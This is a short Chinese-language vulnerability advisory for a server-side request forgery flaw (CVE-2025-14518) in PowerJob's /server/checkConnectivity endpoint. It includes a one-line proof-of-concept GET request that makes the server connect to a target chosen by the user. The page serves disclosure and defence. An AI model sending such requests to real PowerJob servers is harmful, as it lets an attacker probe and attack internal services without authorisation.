PowerJob /server/checkConnectivity 服务器端请求伪造漏洞(CVE-2025-14518)

2026-05-22 PowerJob PoC Public

Description

PowerJob 是一款分布式任务调度系统,广泛应用于企业级数据处理场景。在该系统的 /server/checkConnectivity 端点上存在此漏洞。网络请求的目标 URI 参数是可由用户控制的,并且缺乏足够的安全处理,从而导致了一个 SSRF 漏洞。攻击者可利用此漏洞来探测和攻击目标系统的内部服务。

PoC

GET /server/checkConnectivity?targetPort=443&targetIp=example.com HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities